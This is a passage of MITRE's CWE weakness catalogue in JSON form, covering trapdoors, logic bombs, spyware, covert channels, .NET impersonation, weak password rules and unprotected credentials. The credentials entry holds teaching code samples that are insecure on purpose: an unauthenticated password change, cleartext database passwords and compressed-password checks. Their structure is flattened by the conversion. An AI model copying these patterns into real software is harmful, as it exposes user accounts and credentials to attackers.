Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."},{"Phase":"Testing","Description":"Identify and closely inspect the conditions for entering privileged areas of the code, especially those related to authentication, process invocation, and network communications."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Trapdoor"}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, Relationships"}]}},"511":{"attr":{"@_ID":"511","@_Name":"Logic/Time Bomb","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains code that is designed to disrupt the legitimate operation of the software (or its environment) when a certain time passes, or when a certain logical condition is met.","Extended_Description":"When the time bomb or logic bomb is detonated, it may perform a denial of service such as crashing the system, deleting critical data, or degrading system response time. This bomb might be placed within either a replicating or non-replicating Trojan horse.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"506","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."},{"Phase":"Testing","Description":"Conduct a code coverage analysis using live testing, then closely inspect any code that is not covered."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Typical examples of triggers include system date or time mechanisms, random number generators, and counters that wait for an opportunity to launch their payload. When triggered, a time-bomb may deny service by crashing the system, deleting files, or degrading system response-time."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Logic/Time Bomb"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-172"}}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"512":{"attr":{"@_ID":"512","@_Name":"Spyware","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software collects personally identifiable information about a human user or the user\'s activities, but the software accesses this information using other resources besides itself, and it does not require that user\'s explicit approval or direct input into the software.","Extended_Description":"\\"Spyware\\" is a commonly used term with many definitions and interpretations. In general, it is meant to software that collects information or installs functionality that human users might not allow if they were fully aware of the actions being taken by the software. For example, a user might expect that tax software would collect a social security number and include it when filing a tax return, but that same user would not expect gaming software to obtain the social security number from that tax software\'s data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"506","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"Use spyware detection and removal software."},{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"514":{"attr":{"@_ID":"514","@_Name":"Covert Channel","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A covert channel is a path that can be used to transfer information in a way not intended by the system\'s designers.","Extended_Description":"Typically the system has not given authorization for the transmission and has no knowledge of its occurrence.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1229","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Detection_Methods":{"Detection_Method":{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"SOAR Partial"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Covert Channel"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"463"}}},"Notes":{"Note":{"#text":"A covert channel can be thought of as an emergent resource, meaning that it was not an originally intended resource, however it exists due the application\'s behaviors.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Description, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"515":{"attr":{"@_ID":"515","@_Name":"Covert Storage Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A covert storage channel transfers information through the setting of bits by one program and the reading of those bits by another. What distinguishes this case from that of ordinary operation is that the bits are used to convey encoded information.","Extended_Description":"Covert storage channels occur when out-of-band data is stored in messages for the purpose of memory reuse. Covert channels are frequently classified as either storage or timing channels. Examples would include using a file intended to hold only audit information to convey user passwords--using the name of a file or perhaps status bits associated with it that can be read by all users to signal the contents of the file. Steganography, concealing information in such a manner that no one but the intended recipient knows of the existence of the message, is a good example of a covert storage channel.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"514","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Covert storage channels may provide attackers with important information about the system in question."},{"Scope":["Integrity","Confidentiality"],"Impact":"Read Application Data","Note":"If these messages or packets are sent with unnecessary data contained within, it may tip off malicious listeners as to the process that created the message. With this information, attackers may learn any number of things, including the hardware platform, operating system, or algorithms used by the sender. This information can be of significant value to the user in launching further attacks."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that all reserved fields are set to zero before messages are sent and that no unnecessary information is included."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An excellent example of covert storage channels in a well known application is the ICMP error message echoing functionality. Due to ambiguities in the ICMP RFC, many IP implementations use the memory within the packet for storage or calculation. For this reason, certain fields of certain packets -- such as ICMP error packets which echo back parts of received messages -- may contain flaws or extra information which betrays information about the identity of the target operating system. This information is then used to build up evidence to decide the environment of the target. This is the first crucial step in determining if a given system is vulnerable to a particular flaw and what changes must be made to malicious code to mount a successful attack."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Storage"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Covert storage channel"}]},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"516":{"attr":{"@_ID":"516","@_Name":"DEPRECATED: Covert Timing Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness can be found at CWE-385.","Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":{"#text":"DEPRECATED (Duplicate): Covert Timing Channel","attr":{"@_Date":"2021-07-20"}}}},"520":{"attr":{"@_ID":"520","@_Name":".NET Misconfiguration: Use of Impersonation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Allowing a .NET application to run at potentially escalated levels of access to the underlying operating and file systems can be dangerous and result in various forms of attacks.","Extended_Description":".NET server applications can optionally execute using the identity of the user authenticated to the client. The intention of this functionality is to bypass authentication and access control checks within the .NET application code. Authentication is done by the underlying web server (Microsoft Internet Information Service IIS), which passes the authenticated token, or unauthenticated anonymous token, to the .NET application. Using the token to impersonate the client, the application then relies on the settings within the NTFS directories and files to control access. Impersonation enables the application, on the server running the .NET application, to both execute code and access resources in the context of the authenticated and authorized user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"266","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Operation","Description":"Run the application with limited privilege to the underlying operating and file system."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":".NET Misconfiguration: Impersonation","attr":{"@_Date":"2008-04-11"}}}},"521":{"attr":{"@_ID":"521","@_Name":"Weak Password Requirements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not require that users should have strong passwords, which makes it easier for attackers to compromise user accounts.","Extended_Description":"Authentication mechanisms often rely on a memorized secret (also known as a password) to provide an assertion of identity for a user of a system. It is therefore important that this password be of sufficient complexity and impractical for an adversary to guess. The specific requirements around how complex a password needs to be depends on the type of system being protected. Selecting the correct password requirements and enforcing them through implementation are critical to the overall success of the authentication mechanism.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation","Note":"Not enforcing the password policy stated in a products design can allow users to create passwords that do not provide the necessary level of protection."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could easily guess user passwords and gain access user accounts."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["A product\'s design should require adherance to an appropriate password policy. Specific password requirements depend strongly on contextual factors, but it is recommended to contain the following attributes:","See NIST 800-63B https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf Sections: 5.1.1, 10.2.1, and Appendix A for further information on password requirements."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":[{"xhtml:li":["Enforcement of a minimum and maximum length","Restrictions against password reuse","Restrictions against using common passwords","Restrictions against using contextual string in the password (e.g., user id, app name)"]},{"xhtml:li":[{"#text":"Complex passwords requiring mixed character sets (alpha, numeric, special, mixed case)","xhtml:ul":{"xhtml:li":["Increasing the range of characters makes the password harder to crack and may be appropriate for systems relying on single factor authentication.","Unfortunately, a complex password may be difficult to memorize, encouraging a user to select a short password or to incorrectly manage the password (write it down).","Another disadvantage of this approach is that it often does not result in a significant increases in overal password complexity due to people\'s predictable usage of various symbols."]}},{"#text":"Large Minimum Length (encouraging passphrases instead of passwords)","xhtml:ol":{"xhtml:li":["Increasing the number of characters makes the password harder to crack and may be appropriate for systems relying on single factor authentication.","A disadvantage of this approach is that selecting a good passphrase is not easy and poor passwords can still be generated. Some prompting may be needed to encourage long un-predictable passwords."]}},{"#text":"Randomly Chosen Secrets","xhtml:ol":{"xhtml:li":["Generating a password for the user can help make sure that length and complexity requirements are met, and can result in secure passwords being used.","A disadvantage of this approach is that the resulting password or passpharse may be too difficult to memorize, encouraging them to be written down."]}},{"#text":"Password Expiration","xhtml:ol":{"xhtml:li":["Requiring a periodic password change can reduce the time window that an adversary has to crack a password, while also limiting the damage caused by password exposures at other locations.","Password expiration may be a good mitigating technique when long complex passwords are not desired."]}}]}],"xhtml:p":"Depending on the threat model, the password policy may include several additional attributes."}}},{"Phase":"Architecture and Design","Description":"Consider a second\\n authentication factor beyond the password, which prevents the\\n password from being a single point of failure. See CWE-308 for\\n further information."},{"Phase":"Implementation","Description":"Consider implementing a password complexity meter to inform users when a chosen password meets the required attributes."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"112"}},{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 19: Use of Weak Password-Based Systems." Page 279"}},{"attr":{"@_External_Reference_ID":"REF-1053","@_Section":"Sections: 5.1.1, 10.2.1, and Appendix A"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Modes_of_Introduction, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"522":{"attr":{"@_ID":"522","@_Name":"Insufficiently Protected Credentials","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could gain access to user accounts and access sensitive data used by the user accounts."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use an appropriate security mechanism to protect the credentials."},{"Phase":"Architecture and Design","Description":"Make appropriate use of cryptography to protect the credentials."},{"Phase":"Implementation","Description":"Use industry standards to protect the credentials (e.g. LDAP, keystore, etc.)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-56"},"Intro_Text":"This code changes a user\'s password.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$user = $_GET[\'user\'];$pass = $_GET[\'pass\'];$checkpass = $_GET[\'checkpass\'];if ($pass == $checkpass) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"SetUserPassword($user, $pass);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"While the code confirms that the requesting user typed the same new password twice, it does not confirm that the user requesting the password change is the same user whose password will be changed. An attacker can request a change of another user\'s password and gain control of the victim\'s account."},{"attr":{"@_Demonstrative_Example_ID":"DX-57"},"Intro_Text":"The following code reads a password from a properties file and uses the password to connect to a database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...Properties prop = new Properties();prop.load(new FileInputStream(\\"config.properties\\"));String password = prop.getProperty(\\"password\\");DriverManager.getConnection(url, usr, password);...","xhtml:br":["","","","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to config.properties can read the value of password. If a devious employee has access to this information, they can use it to break into the system."},{"attr":{"@_Demonstrative_Example_ID":"DX-58"},"Intro_Text":"The following code reads a password from the registry and uses the password to create a new network credential.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String password = regKey.GetValue(passKey).toString();NetworkCredential netCred = new NetworkCredential(username,password,domain);...","xhtml:br":["","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system"},{"attr":{"@_Demonstrative_Example_ID":"DX-59"},"Intro_Text":"Both of these examples verify a password by comparing it to a stored compressed version.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"#text":"if (strcmp(compress(password), compressed_password)) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (passwd.Equals(compress(password), compressed_password)) {}return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return(0);","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""],"xhtml:i":"//Diagnostic Mode"}}}],"Body_Text":"Because a compression algorithm is used instead of a one way hashing algorithm, an attacker can recover compressed passwords stored in the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...<connectionStrings></connectionStrings>...","xhtml:br":["",""],"xhtml:div":{"#text":"<add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" />","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0681","Description":"Web app allows remote attackers to change the passwords of arbitrary users without providing the original password, and possibly perform other unauthorized actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0681"},{"Reference":"CVE-2000-0944","Description":"Web application password change utility doesn\'t check the original 